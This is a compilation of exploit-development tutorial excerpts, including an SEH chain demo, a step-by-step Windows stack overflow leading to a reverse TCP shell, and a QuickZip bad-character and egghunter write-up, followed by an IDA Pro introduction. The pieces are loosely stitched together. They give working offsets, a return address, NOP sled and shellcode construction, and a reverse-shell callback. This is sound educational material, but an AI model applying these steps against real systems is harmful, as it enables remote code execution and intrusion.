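        next_record, handler = records[address]
        if next_record == END_OF_CHAIN:
            return handler == final_handler   # last record must be the expected one
        address = next_record
    return False

FINAL_HANDLER = 0x7C90E900                    # hypothetical validation handler
intact = {
    0x0012FF5C: (0x0012FFDC, 0x00401500),
    0x0012FFDC: (END_OF_CHAIN, FINAL_HANDLER),
}

# After an overflow: Next SEH holds jump code, SEH holds a pop pop ret pointer.
jump_as_pointer = struct.unpack("<I", b"\xEB\x06\x90\x90")[0]
overwritten = dict(intact)
overwritten[0x0012FF5C] = (jump_as_pointer, 0x6601228E)

print(chain_is_intact(intact, 0x0012FF5C, FINAL_HANDLER))        # True
print(hex(jump_as_pointer))                                      # 0x909006eb
print(chain_is_intact(overwritten, 0x0012FF5C, FINAL_HANDLER))   # False
```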
SEHOP was introduced in Windows Vista SP1 and is available on subsequent desktop and
server versions. It is enabled by default on Windows Server Editions (from 2008 on) and
disabled by default on desktop versions. EMET also provides SEHOP protection.
Additional Resources
If you’re interested in researching more on the topic of SEH check out some of these
resources:
• A Crash Course on the Depths of Win32™ Structured Exception Handling (Matt Pietrek)
• SEH Stack Based Windows Buffer Overflow Tutorial (The Grey Corner)
• The Need for a POP POP RET Instruction Sequence (Dimitrios Kalemis)
Conclusion
It’s my hope that this tutorial (and the referenced resources) provided a basic understanding
of how Microsoft implements exception handling and how SEH can be leveraged for exploit
development. As always, I’m interested in feedback; you can leave it in the comments section,
on Twitter, or both. Stay tuned for the next installment in the series on Unicode-based
exploits.
• Make a simple script to shove a bunch of garbage into an input field and crash the
program
• Find the exact number of characters required to reach the EIP (instruction pointer)
• Inspect the program's .dll files to find one without memory protections
• Once you've found a suitable .dll, search for a JMP ESP (jump to the stack pointer)
instruction
• Make shellcode
• Find the 'bad' characters that will prevent your exploit from working
• Update your simple script to hit the EIP, jump to the ESP and execute your shellcode
If you haven't done this before, many of the terms above will be unfamiliar, but don't worry.
You can do simple buffer overflows without knowing much about Assembly or memory layout,
and you'll learn a lot along the way. I spent far too much time reading about those things and
freaking myself out. All you need to get started is in the video below.
Bad Characters
Bad characters are unwanted characters that can break the shellcode. There is
no universal set of bad characters: depending on the application and the developer's logic,
every program we encounter has its own set. Therefore, we have to find the bad
characters in every application before writing the shellcode. Some very common bad
characters are:
• 00 for NULL
So, now let’s run the server program normally on Machine A.
Figure: 1
As can be seen in the above screenshot, the server program is running on Machine A,
and in our case the IP address of the machine is 192.168.1.173 (this will differ according
to your network configuration). The server program waits on port 10000 for incoming
connections.
Now, we will connect to the server program from Machine B. We will be using the Netcat tool on
Machine B to connect to the server program that is running on Machine A. This is the same
tool that we used in the previous articles.
After connecting to the server program, we can see that whatever we type on Machine B
is echoed back to Machine B; this is the functionality of the server program.
We can see the same in the following screenshot.
Figure: 2
Now, everything is ready. So, we will proceed to write the exploit. The steps to write the
exploit are given below.
Let’s open the Python script which we have already used in the previous articles, change
the port number from 9000 to 10000 because this program listens on a different port, and send
500 A’s as input to the program. We can do this by setting input = "A"*500. We can see the same
Python script in the screenshot below.
Figure: 3
As can be seen in the screenshot, we have changed the port number to 10000 and
assigned 500 A’s to the input variable. When the Python script runs, it sends the A’s to the
server program.
(Note: For now, this is the simple Python script shown in the above screenshot;
later on, we will develop the exploit by editing this script, as we did in the
previous article.)
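The script in the screenshot is not reproduced in these notes, so the following is only a minimal Python 3 sketch of the step just described, not the original code. The helper names build_input and send_input are hypothetical; the host and port are the values quoted in the walkthrough and will differ in your lab.

```python
import socket

# Values quoted in the walkthrough; adjust them to your own lab setup.
HOST = "192.168.1.173"  # Machine A, where the vulnerable server runs
PORT = 10000            # port the server listens on


def build_input(length=500):
    """Return `length` bytes of 'A' (0x41) to overflow the buffer."""
    return b"A" * length


def send_input(data, host=HOST, port=PORT, timeout=5.0):
    """Open a TCP connection, send the data once, and close the socket."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(data)
```

Calling send_input(build_input(500)) from Machine B should correspond to running the script described above. Keeping payload construction separate from sending makes it easier to swap in the pattern, the character list, and finally the shellcode in the later steps.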
Now, save the Python script and run the program on machine B. We can see the same in the
screenshot given below.
Figure: 4
It can be seen in the following screenshot that our server program has crashed, and when we
click on “click here,” we can see that the offset is overwritten by 41414141, which is AAAA in
hexadecimal.
Figure: 5
This is enough to confirm that this program is vulnerable to a buffer overflow.
Now, we will have to identify the exact position at which the EIP register is overwritten by the
user input. We can do it by inserting the pattern as input. (We have already done the same in
the previous articles, so we are not going to discuss it here in detail.) Now, generate a
pattern of 500 bytes and replace the A’s in the Python script with it. We can see the same in
the following screenshot.
• /usr/share/metasploit-framework/tools/pattern_create.rb 500
Figure: 6
As can be seen in the above screenshot, we have added the generated pattern to the
Python script. Now save the Python script, open and run the server program in the
debugger (on Machine A), and then run the Python script on Machine B.
Figure: 7
As can be seen in the above screenshot, the program has crashed again, and when we look
closely at the debugger (Machine A) we can see the following information.
Figure: 8
In the above screenshot, we see that EIP is overwritten with the value 6A413969 and the top of
the stack holds the value 316A4130. Now, we will run the following commands to get the exact
offsets of the overwritten locations.
• /usr/share/metasploit-framework/tools/pattern_offset.rb 6a413969
• /usr/share/metasploit-framework/tools/pattern_offset.rb 316a4130
Figure: 9
Now we have the exact offsets at which the user input overwrites EIP and the top of the stack.
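To make the pattern step less of a black box, here is a rough Python sketch of the same idea. It is not the Metasploit implementation: pattern_create and pattern_offset are hypothetical helpers that only assume the usual Aa0Aa1Aa2... layout (uppercase letter, lowercase letter, digit).

```python
import string
from itertools import product


def pattern_create(length):
    """Build a cyclic pattern of the form Aa0Aa1Aa2... with `length` characters."""
    triples = []
    for upper, lower, digit in product(string.ascii_uppercase,
                                       string.ascii_lowercase,
                                       string.digits):
        if len(triples) * 3 >= length:
            break
        triples.append(upper + lower + digit)
    return "".join(triples)[:length]


def pattern_offset(register_value, length=500):
    """Return the offset of a register value (hex string) within the pattern.

    The debugger shows the four bytes as a little-endian integer, so the
    bytes are reversed before searching. Returns -1 if nothing matches.
    """
    needle = bytes.fromhex(register_value)[::-1].decode("ascii")
    return pattern_create(length).find(needle)


print(pattern_offset("6A413969"))  # value seen in EIP
print(pattern_offset("316A4130"))  # value seen at the top of the stack
```

For the two values above, the sketch reports offsets 268 and 272: EIP is overwritten after 268 bytes of filler, and the top of the stack holds the bytes that immediately follow the four EIP bytes.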
Now, we will write four B’s after the 268-byte data so that our scenario would be clear. We can
do it by making the following changes in the Python script.
Figure: 10
As seen in the above screenshot, we first added 268 A’s, then four B’s, and finally
some C’s to the input. Later on, we will replace the B’s with a memory address and the C’s
with our shellcode.
Now, let’s restart the debugger by hitting CTRL+F2 in the machine A and run the Python script
again.
Figure: 11
As can be seen in the above screen shot, after running the changed Python script EIP is
overwritten with 42424242 and the rest of the stack is holding the value 43434343 in which 42
represents B’s in hexadecimal and 43 represents C’s in hexadecimal.
As defined earlier in this article, any unwanted characters that can break
the shellcode are considered bad characters. So let’s find
out whether this application has any bad characters. The steps to identify the bad
characters are given below.
• Send the full list of characters from 0x00 to 0xFF as input to the program.
• Check in the debugger whether the list arrives intact; the first character that is missing,
altered, or truncates the input is a bad character.
• Remove that character from the list and go back to the first step.
• If the input no longer breaks, the remaining characters can be used to generate the shell
code.
First, we have to generate all the characters that could be used in the shellcode.
We can do this by writing our own code that generates the list of all characters. The following
C program generates the list of all the characters.
Figure: 12
We can see the source code of badchar.c in the above screenshot. We compiled
it with the gcc compiler, and when we run the output file it generates and prints the list of
all characters.
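The badchar.c source is only visible in the screenshot, so as a stand-in here is a short Python sketch that produces the same kind of list. The helper names all_chars and as_escaped are hypothetical, and the output format (quoted \xNN strings, 16 per row) is an assumption chosen so the result can be pasted into a script.

```python
def all_chars(exclude=b""):
    """Return every byte value 0x00..0xFF except those listed in `exclude`."""
    return bytes(b for b in range(256) if b not in exclude)


def as_escaped(data, per_line=16):
    """Format bytes as quoted \\xNN strings, `per_line` bytes per row."""
    rows = []
    for start in range(0, len(data), per_line):
        chunk = data[start:start + per_line]
        rows.append('"' + "".join("\\x%02x" % b for b in chunk) + '"')
    return "\n".join(rows)


print(as_escaped(all_chars()))
```

Once a bad character is identified, passing it in exclude (for example all_chars(b"\x00")) regenerates the list without it for the next round.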
Now, we copy all the characters and add it into the Python file as input after the B’s.
Figure: 13
As can be seen in the above screenshot, we have appended to the Python script the character
list that we generated by running the C program. Now, after saving the Python script,
restart the debugger and re-run the Python script.
Figure: 14
Now, we can see in the above screenshot that the program has crashed again, and if we look
closely at the stack we can see that EIP is overwritten with 42424242, which is BBBB in
hexadecimal, but after that we see unexpected values in the stack instead of our character list.
We can see the same in the following screenshot.
Figure: 15
Therefore, the first character in the list may be a bad character. So,
we remove the first character from the Python script on Machine B. We can see this in the
screenshot given below.
Figure: 16
It can be seen in the above screenshot that the first character was \x00 and we have removed it
from the Python script. Now, we will restart the debugger on Machine A and run the program
again.
Figure: 17
After running the Python script, we can see that the program has crashed again, but when we
look closely at the stack, we see the same character list that we entered
into the Python script, and if we scroll down the stack tab, we also see our C’s in the stack. We
can verify the same by checking the hex dump.
Figure: 18
This confirms that we have only one bad character, which is "\x00" (NULL). In simple words,
we cannot use "\x00" anywhere in the user input, as it is identified as a bad character.
Now that we have identified the bad character in the application, we will remove the character
list from the Python script. After removing the character list, our Python script will look like
this.
Figure: 19
In this section, we will shift the program execution control to a different position, which could
be the address where the shell code is stored in the memory by modifying the EIP value.
In this article, we have already replaced the EIP value with the BBBB. Let’s run the Python
script again and we get following output on the screen of machine A.
Figure: 20
In the previous article we replaced the B’s with the address of the next instruction to shift
execution control to it, but we cannot do the same in this situation because that
address contains 00, and 00 is a bad character in this program, as
identified in the previous step. So, we have to use a different approach to supply the
address.
Now, if we look closely at the Registers section in the above screenshot, we can see that ESP
points to the C’s on the stack. So, imagine that BBBB is replaced with the
address of a JMP ESP instruction somewhere in memory: execution
jumps to that instruction, which in turn jumps right back to the C’s, because ESP
points to them. This is called the JMP ESP technique. Later in the article, we will replace
the C’s with the shellcode.
Let’s implement this technique and find the JMP ESP instruction in the program. So restart the
program in the debugger and Press ALT+E. It will open another screen and show DLL’s which
are being used in the program. We can see the same in the screenshot given below.
Figure: 21
Now, open any DLL and search for the JMP ESP instruction that does not have the Null Byte in
the address. In our case we will use “ntdll.dll,” let’s open it by clicking on it and we will see the
following screen.
Figure: 22
Press CTRL+F, the Find Command box will open. Now enter the “JMP ESP” in the search box
and hit enter key. After that, we can see the following screen.
Figure: 23
As we can see in the above screenshot, the JMP ESP instruction is highlighted and we can also
see the corresponding address on the left-hand side. This is the address with which we
have to replace the B’s in the Python script. We write this address in the Python script in
reverse (little-endian) byte order, so the address becomes:
"\xed\x1e\x94\x7c"
Now, replace the B’s in the Python script with this address, and set a breakpoint on the JMP ESP
instruction in the debugger to verify the behavior in detail. We can set the breakpoint by
pressing the F2 key.
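Reversing the address bytes by hand is error-prone, so a small helper can do it. This is a sketch only: pack_address is a hypothetical name, and the address 0x7C941EED is simply the reversed byte string from the text read back as an integer, so it will differ on other Windows builds.

```python
import struct


def pack_address(address, badchars=b"\x00"):
    """Pack a 32-bit address in little-endian order and reject bad characters."""
    packed = struct.pack("<I", address)
    found = [b for b in packed if b in badchars]
    if found:
        raise ValueError("address contains bad characters: %r" % bytes(found))
    return packed


# JMP ESP address from the walkthrough, packed as \xed\x1e\x94\x7c.
JMP_ESP = pack_address(0x7C941EED)
```

The bad-character check mirrors the reasoning above: an address containing \x00 would raise an error here instead of silently truncating the payload.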
After doing the changes in the Python script, the script will look like this.
Figure: 24
Now, we run the Python script again with the changes and following would be the output.
Figure: 25
As can be seen in the above screenshot, the server did not crash this time; it
paused at the breakpoint we set, and we can also see our A’s, the JMP ESP address,
and the C’s in the stack. Everything looks right so far. Now, press the F7 key, which is Step
Into.
Figure: 26
As can be seen in the above screenshot, our JMP instruction was successfully executed and EIP
is pointing to the next instruction. Now, we will replace C’s with the shell code.
Now, generate the shellcode with the help of msfvenom. Msfvenom also gives us the flexibility
to exclude bad characters. The following command generates the shellcode.
After running the command, we can see that the shell code is successfully generated and when
we closely look into the shell code, we can see that it does not contain any x00 value in the
code.
Figure: 27
As can be seen in the above screenshot, our reverse TCP shellcode is generated. Now,
before appending the shellcode to the Python script, we have to add some additional
instructions to the script. The instructions that we are going to add are
called a NOP sled.
NOP stands for no operation: when the CPU encounters a NOP, it
performs no action and passes execution control to the next
instruction. A NOP is encoded as "\x90", and a run of NOPs is called a NOP sled. So let’s add
a sled of 20 NOPs to the Python script before the shellcode. After making the changes, the
script will look like this.
Figure: 28
As can be seen in the above screenshot, we have appended the NOP sled and the shellcode to
the Python script. Now we save this script, restart the program in the debugger, and run the
Python script again.
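Putting the pieces together, the final input has the layout filler + JMP ESP address + NOP sled + shellcode. The sketch below illustrates that layout under stated assumptions: build_exploit is a hypothetical helper, and SHELLCODE is a placeholder of four INT3 (0xCC) bytes standing in for the msfvenom output, which is not reproduced in these notes.

```python
import struct

OFFSET = 268                             # filler bytes before EIP (from the text)
JMP_ESP = struct.pack("<I", 0x7C941EED)  # JMP ESP address quoted in the walkthrough
NOP_SLED = b"\x90" * 20                  # 20 NOPs, as in the walkthrough
SHELLCODE = b"\xcc" * 4                  # PLACEHOLDER: INT3 bytes, not real shellcode


def build_exploit(shellcode=SHELLCODE, badchars=b"\x00"):
    """Assemble filler + return address + NOP sled + shellcode."""
    payload = b"A" * OFFSET + JMP_ESP + NOP_SLED + shellcode
    bad = sorted(set(payload) & set(badchars))
    if bad:
        raise ValueError("payload contains bad characters: %r" % bytes(bad))
    return payload


payload = build_exploit()
print(len(payload))
```

Because ESP points just past the overwritten return address, the JMP ESP lands on the NOP sled and slides into whatever follows it.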
Figure: 29
The program has again paused in the debugger at the breakpoint we set on the JMP
instruction, and we can see that EIP and ESP hold the values which we supplied
in the Python script. If we look closely at the debugger, we can see that everything we
appended in the Python script has reached the stack: the JMP
instruction address, the NOP sled and the shellcode.
Now press F9 to continue the program, and we can see that the program does not crash as in the
previous cases. This is great news for us.
The shellcode we supplied through the user input is executing in memory. That
is why the program does not crash. So, now let’s try to connect with Netcat on port 4444 from
Machine B.
Figure: 30
As can be seen in the above screenshot, we successfully got the reverse connection on
Machine B. Now we can verify the same by running the server program without the
debugger.
https://resources.infosecinstitute.com/topic/stack-based-buffer-overflow-in-win-32-platform-part-6-dealing-with-bad-characters-jmp-instruction/
When you begin your journey in exploitation, you start with simple buffer overflows, then you
deal with SEH, play with egg hunters and so on. The process of exploitation is pretty
straightforward in this journey: sending a pretty large cyclic pattern, figuring out the offset
to EIP in order to control it, then passing the address to JMP ESP or POP POP RET or other
gadgets which ultimately will execute our shellcode.
However, perhaps the most undervalued step in this journey would have been finding bad
characters. And I understand why. Most of the time the bad characters situation is easily dealt
with using an encoder. But what if the number of bad characters is greater than good ones?
That’s when things get tricky. Suddenly this seemingly insignificant step becomes a huge pain
and affects every other step of exploit development. QuickZip 4.60 was a similar kind of story
that is discussed in detail by corelanc0d3r here, which is also what I’m about to do. BUT, the method
I’m about to use is slightly different (not claiming it to be better or worse, just different) than
the one (actually two) discussed there. So, let’s get started.
Before I begin, note that the environment I’m going to use is Windows Vista x86. The original
article was written for a Windows XP SP3 environment, so you might notice some differences in
the offsets and addresses.
The crash!
I will jump straight to the PoC code that I copied from the article in order to replicate the
crash.
This PoC will create an exploit.zip file which needs to be opened using QuickZip. Double-
clicking on the filename will result in the crash.
The crash
Interestingly, the crash doesn’t look exploitable, there’s no cyclic pattern in EIP or SEH chain.
SEH chain
But if we pass the exception using Shift + F9, we can observe the SEH chain pops up with the
pattern.
The offset
Alright. From the address 396A4138, we can deduce the offset of 296 bytes. Let’s confirm it
first. We’ll modify the payload a bit:
We’ll recreate the malicious ZIP file and get a crash like this which confirms our offsets.
Confirming offset
Now comes the brutal part: finding the bad characters. Mona.py from corelanc0d3r will help
us a lot here. Since we are putting our payload in the filename, we can do some guesswork to
predict some bad characters. Characters like / \ : should be in the bad char list. But let me
demonstrate a simple procedure which uses mona.py to ease the process of finding bad
characters.
To find bad characters, we will send an array of all possible characters as part of the payload.
Then we’ll use mona.py to compare the array with the memory.
To create the array, you can use !mona bytearray command. This will print the array in
Immunity Debugger’s log, and also create files bytearray.txt and bytearray.bin. You can copy
the array from the bytearray.txt file, the bytearray.bin file will be used in comparison later.
Generating bytearray
For a quick reference, these oneliners can also be used to generate the array:
Python
for i in range(0,256): print('\\x%02X' % i, end='')
Bash
for i in {0..255}; do printf "\\\x%02x" $i;done
We’ll modify our PoC code to generate the ZIP file with our bytearray. After modification, our
code should look something like this:
We’ll run the generated ZIP through QuickZip and see what happens.
Truncation after NULL
Right off we see that the \x00 is causing problems. Let’s recreate the ZIP after removing it and
repeat the process.
Woah! What just happened? Looking at Immunity, we do see a few registers pointing at our
payload. Following it in the dump shows some interesting things. \x0F, \x14, \x15 and \x2F are
mangled and everything after \x3A is truncated. It makes sense though: \x3A is the colon (:)
character, and a filename containing a colon is expected to have everything after it truncated.
Mangled bytearray in memory
But visually identifying mangled characters is a pain and it leaves a lot of room for errors. I
mean, I missed \x14 and \x15 myself. That’s why we’d like an automated way to find these
differences and mona will help us here. Just pass the following command to mona:
We can see how beautifully mona helps us with the bad chars. We’ll repeat this process after
removing bad chars. This time our payload is being treated as a folder instead of file:
Payload as folder
If we closely look at the error message, we can figure out the error happened
around \ character which also makes sense and explains why our payload was being treated as
a folder. We’ll remove \ or \x5C from our array and try again. This time we’ll get a clean crash.
A quick look at the comparison and WHAT A HORROR STORY WE HAVE!
Every character from \x80 onward is mangled! Not missing, mangled! This is different from the crash
we had with \x3A, where the contents got truncated after that character. Here every character is
getting converted to something else, so every character from \x80 onward is bad! The final list of bad chars is:
Bad chars:
\x00\x0F\x14\x15\x2F\x3A\x5C
\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8A\x8B\x8C\x8D\x8E\x8F
\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9A\x9B\x9C\x9D\x9E\x9F
\xA0\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xAB\xAC\xAD\xAE\xAF
\xB0\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xBB\xBC\xBD\xBE\xBF
\xC0\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xCB\xCC\xCD\xCE\xCF
\xD0\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xDB\xDC\xDD\xDE\xDF
\xE0\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xEB\xEC\xED\xEE\xEF
\xF0\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFB\xFC\xFD\xFE\xFF
Now that we have more than half of all characters as bad, let’s figure out how we can proceed
further.
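The kind of comparison mona performs can be approximated offline if you save the bytes you sent and the bytes you observed in memory. The sketch below is not mona's algorithm: compare_bytes is a hypothetical helper that assumes a strict position-by-position match, so it distinguishes mangled bytes from truncation but would be misled by a byte that is dropped and shifts everything after it. The sample values in the usage lines are invented for illustration only.

```python
def compare_bytes(sent, observed):
    """Compare sent bytes with a memory dump, position by position.

    Returns (mangled, truncated_at): `mangled` maps each altered byte to the
    value found in memory, and `truncated_at` is the index of the first sent
    byte that is missing from the dump (None if nothing was cut off).
    """
    mangled = {}
    for index, expected in enumerate(sent):
        if index >= len(observed):
            return mangled, index
        if observed[index] != expected:
            mangled[expected] = observed[index]
    return mangled, None


# Hypothetical sample: 0x0F arrives as 0x20 and the dump ends after 0x3A.
sent = bytes([0x01, 0x0F, 0x10, 0x3A, 0x3B])
observed = bytes([0x01, 0x20, 0x10, 0x3A])
print(compare_bytes(sent, observed))
```

Keeping the mangled map, rather than only a list of bad bytes, matters later: it records what each bad byte turns into, which is exactly the information needed to decide whether a conversion can be reused.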
The first step in SEH exploitation is to find a suitable POP POP RET address. Looking at the
loaded modules, we can only find the QuickZip.exe itself without SafeSEH.
The base address of that module doesn’t look very promising though, and we immediately face a
pretty big challenge: all the addresses from this module have a NULL byte as their
most significant byte. But let’s ignore it for now and pick one that doesn’t have other bad
characters. One such address is 0x00407A33. Let’s verify that this address really works. We’ll
modify our payload to something like this:
Recreate the ZIP. Open it with QuickZip. Double click on filename. And we
have 0x00407A33 listed in SEH chain.
Let’s set a breakpoint at 0x00407A33 and verify POP POP RET too.
Verifying POP POP RET
Perfect! Sad thing to notice here is that all our Ds are truncated.
Now that we have a working POP POP RET, how do we jump? Our good old \xEB is among bad
chars. Plus, we’ll have to perform a negative jump as everything after the address is truncated,
the only place left for shellcode is the starting 296 bytes. And negative jump means using a
value from \x80 to \xFF, all of them are bad chars.
We can resolve the JMP issue by using any of the conditional jumps. Instead of me explaining
it, you can go to this article by corelanc0d3r, there’s a table at the bottom listing all the
conditional jumps and their opcodes.
This is where my method starts to differ from method used by corelanc0d3r. We notice that
almost every bad char is getting mangled to another character. The trick here is to leverage
this conversion to un-bad the bad characters. Let’s look at the mangled bytearray again.
Mangled bytearray
We can notice here that \x87 is getting mangled to \xE7. So, if we want \xE7 in our shellcode,
we’d use \x87 instead and QuickZip will convert it to \xE7 for us. And wait a minute, we
have \xEB among possibly-good chars too, we can use it instead, no need for conditional
jumps!
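The "un-bad" trick amounts to inverting the observed conversion table. Here is a minimal sketch of that lookup, using only the three conversions mentioned in this write-up (\x87 to \xE7, \x89 to \xEB, \xF6 to \xF7). The helper name bytes_to_send and the unchanged parameter are hypothetical, and a real table would have to be filled in from your own comparison results.

```python
# Conversions reported in the text: byte sent -> byte observed in memory.
MANGLING = {0x87: 0xE7, 0x89: 0xEB, 0xF6: 0xF7}


def bytes_to_send(wanted, mangling=MANGLING, unchanged=b""):
    """Return the bytes to place in the payload so `wanted` ends up in memory."""
    inverse = {observed: sent for sent, observed in mangling.items()}
    out = bytearray()
    for value in wanted:
        if value in unchanged:
            out.append(value)           # survives as-is
        elif value in inverse:
            out.append(inverse[value])  # let the application convert it for us
        else:
            raise ValueError("no known way to produce 0x%02X" % value)
    return bytes(out)


print(bytes_to_send(b"\xEB\xF7").hex())
```

For the short jump \xEB\xF7, the lookup yields \x89\xF6 as the bytes to send.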
Let’s test this theory and perform a negative jump. We will use \x89\xF6 which should give
us \xEB\xF7 in memory, and it translates to JMP 0xF7 or ‘Jump back 7 characters’ (remember,
offset is counted considering the length of JMP instruction itself). We’ll modify our payload to
look something like:
Our JMP should take us at the beginning of Bs. Let’s see what happens.
JMP 0xF7
Excellent! We can see our JMP instruction and the resulting jump here. Our theory is
working properly and we’ll be using it extensively in future.
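The "jump back 7" arithmetic is easy to get wrong by two bytes, so here is the calculation spelled out. The operand of a short JMP (opcode EB) is a signed 8-bit displacement measured from the end of the two-byte instruction. The helper names rel8 and short_jmp_target and the example address 0x1000 are hypothetical.

```python
def rel8(operand):
    """Interpret a one-byte JMP operand as a signed 8-bit displacement."""
    return operand - 0x100 if operand >= 0x80 else operand


def short_jmp_target(jmp_address, operand):
    """Address reached by the two-byte short jump EB <operand> at `jmp_address`."""
    return jmp_address + 2 + rel8(operand)


print(rel8(0xF7))                              # displacement from the next instruction
print(short_jmp_target(0x1000, 0xF7) - 0x1000)  # net movement from the JMP itself
```

The operand 0xF7 is -9 as a signed byte; measured from the start of the JMP, the net movement is -7, which matches the description above.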
Using our theory, we can quickly eliminate many possibly-good chars from bad char list. Our
list effectively becomes:
Bad chars:
\x00\x0F\x14\x15\x2F\x3A\x5C
\x80\x81\x82\x84\x85\x86\x87\x88\x89\x8A\x8B\x8C\x8D\x8E\x8F
\x90\x91\x92\x93\x94\x95\x96\x97\x99\x9A\x9B\x9C\x9D\x9E\x9F
\xA4\xA7\xA8\xA9\xAD\xAE
\xB3\xB4\xB6\xB8\xB9\xBE
\xC0\xC1\xC2\xC3\xC8\xCA\xCB\xCC\xCD\xCE\xCF
\xD0\xD2\xD3\xD4\xD5\xD7\xD8\xD9\xDA\xDB\xDD\xDE
\xE3
\xF0\xF5\xF8\xFD\xFE
Not as huge as before, but still a lot! At least enough to keep troubling us.
So, we have a way to perform negative jumps now, but that still leaves us with only 296 bytes
to execute our shellcode, that too without considering the jumps we’ll need. With the tight
restrictions we have, standard shellcodes like bind or reverse shell would be very difficult to
write. The encoders can help us, yes, but with so many bad chars, none of them would
succeed. The best bet is using Alpha2 encoder. After using BufferRegister to get pure
alphanumeric shellcode (more on it here), the size of the payload becomes 710 bytes!
When we face issues with size of payload, the thing that immediately pops in our mind is an
egghunter (huge props to Skape)! Encoding the egg hunter, we see:
This looks much better. But the question is- where will we put the shellcode? It’s time to step
back a bit and think, are the Ds really getting truncated? If the application is loading the ZIP,
the whole, unaltered ZIP may be there somewhere in memory. Let’s find it out.
Finding Ds
A quick search reveals the Ds are indeed there in memory. However, none of the registers are
pointing to this address, nor is it on the stack. That’s OK: the egghunter is small enough to fit at
the beginning of the payload, so we can use that. With an egghunter in place, our payload would look
something like this:
payload = "A"*n + egghunter + "JMP[egghunter]" + POPPOPRET + [Egg + Shellcode]
While encoding our egghunter, we have to provide a BufferRegister otherwise the shellcode
will contain bad chars. We provided a BufferRegister of EAX. That means the shellcode
assumes it has address of itself stored in EAX register. How will we store the address of
shellcode in EAX? This is where a CALL instruction would help us.
A CALL instruction pushes the address of the next instruction onto the stack and jumps to the
provided offset. We can then POP that address from the stack into EAX. The CALL instruction takes
a 4-byte offset. If we use a small positive offset, its upper 3 bytes would be \x00, which is not
desirable. So, a negative offset makes sense, since \xFF is not a bad char. We are looking at
something like this:
Time for some maths. A CALL instruction takes 5 bytes. The egghunter is 118
bytes. The JMP instruction itself is 2 bytes. So, we need to go back 125 (0x7D) bytes. As a
negative 32-bit offset, -125 is 0xFFFFFF83, so its low byte is \x83. Good news is that \x83 is
not a bad char.
Now, POP EAX takes 1 byte. JMP will take 2 bytes. So, any offset of 3 bytes or above will work.
We have \xF7 available to us.
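The CALL arithmetic above can be checked with struct. This is just a sketch of the encoding: call_rel32 is a hypothetical helper, the three lengths are the figures quoted in the text, and the exact layout of your own payload may call for a different distance.

```python
import struct

EGGHUNTER_LEN = 118  # encoded egghunter size quoted in the text
JMP_LEN = 2          # short JMP
CALL_LEN = 5         # opcode E8 plus a 4-byte displacement


def call_rel32(displacement):
    """Encode CALL rel32 (opcode E8) with a signed little-endian displacement."""
    return b"\xE8" + struct.pack("<i", displacement)


back = -(EGGHUNTER_LEN + JMP_LEN + CALL_LEN)
print(back, call_rel32(back).hex())     # negative offset: 83 followed by FF bytes
print(call_rel32(-back).hex())          # positive offset: contains 00 bytes
```

The negative displacement encodes as e8 83 ff ff ff, while the same distance forward would encode as e8 7d 00 00 00, which is why the backward CALL is the only workable choice here.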
Final piece in the puzzle is our shellcode. We can encode the shellcode with same Alpha2
encoder. This time we will use EDI as BufferRegister, egghunter will already have the address
stored in this register. You can use other encoders as well, since bad chars wouldn’t matter for
shellcode. But you still need to consider \ / : as bad chars as these characters have special
meaning for filenames.
I encourage you to rewrite the whole exploit with your own ideas. Corelanc0d3r’s article also
encourages you to think and think hard. Try random stuff, break things. If you found a different
method to exploit this then please share with us. Remember to always try harder!
https://medium.com/@notsoshant/windows-exploitation-dealing-with-bad-characters-quickzip-exploit-472db5251ca6
https://www.bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/
IDA Pro
IDA Pro is the best disassembler in the business. Although it costs a lot, there’s still a free
version available. I downloaded IDA Pro 6.2 limited edition, which is free but only
supports disassembly of x86 and ARM programs. The full version supports a myriad of other
platforms, which we won’t need here.
When IDA Pro is first loaded, a dialog box will appear asking you to disassemble a new file, to
enter the program without loading any file, or to load the previously loaded file. This can be
seen below:
We’ll choose to disassemble a new file. We’ll select the reverse Meterpreter executable that
we previously created with Metasploit framework. We can also disable the “Display at startup”
checkbox in the bottom of the window presented on the picture above so that IDA Pro runs
only when we want to use it. I guess whenever we’ve been working on some file already, it’s
best to click on the Previous button to open one of the files we’ve been working on in the past.
Upon opening the executable, IDA Pro will automatically recognize the file format of the
executable: in our case, it is a PE Windows executable. It will also recognize the architecture
the executable was compiled against. This can be seen on the picture below, where the
Processor Type of “Intel 80x86 processors: metapc” is detected. The processor type specifies
the processor module that will be used to disassemble the executable. The processor modules
are located under IDA Pro’s procs directory; in my case, the following modules are available:
arm.ilx and pc.ilx. Usually, the executable architecture and processor type are recognized
successfully and we won’t need to change that in the presented window.
The list of potential file types is generated from the loaders located in IDA Pro’s loaders
directory. IDA Pro will automatically present the file types that can be used to work with the
loaded file. Any file loader that can recognize the analyzed file will be presented and we will be
able to choose any of them. On my version of IDA Pro, the loaders directory contains the
following files: dbg.llx, elf.llx, macho.llx, pe.llx. In our case, it was the pe.llx that was able to
recognize the analyzed file and display itself as the “Portable executable for 80386” option.
After we click on the OK button, IDA Pro will load a file as if it was loaded by the operating
system itself.
Database files
Upon opening a new file to analyze with IDA Pro, it analyzes the whole executable file and
creates an .idb database archive. The .idb archive contains four files [1]: .id0, .id1, .nam and .til.
All of these file formats are proprietary and can only be used in IDA. Once the .idb database
has been created for a specific executable, IDA won’t need to analyze the program again when
we load it later. Moreover, IDA doesn’t even require the executable anymore; we can now
work with just the .idb file. This is a useful feature that can be used to pass around .idb files to
other researchers without the malicious executable. Therefore, IDA can analyze the executable
without the actual executable, and with only the database archive file.
Anytime we’re trying to close the currently open .idb database (the currently analyzed
executable), IDA asks us if we would like to save changes to the disk. We can choose from the
following options:
• Don’t pack database: flush changes to the .id0, .id1, .nam and .til databases and don’t create
an .idb file.
• Pack database (Store): archives the .id0, .id1, .nam and .til files into the .idb archive. Note
that the .idb of the previous session is overwritten.
• Pack database (Deflate): the same as the previous option, except the database files are
compressed in the .idb archive.
• Collect garbage: deletes any unused memory pages from the database. This can be
useful if we want to create a smaller database .idb file.
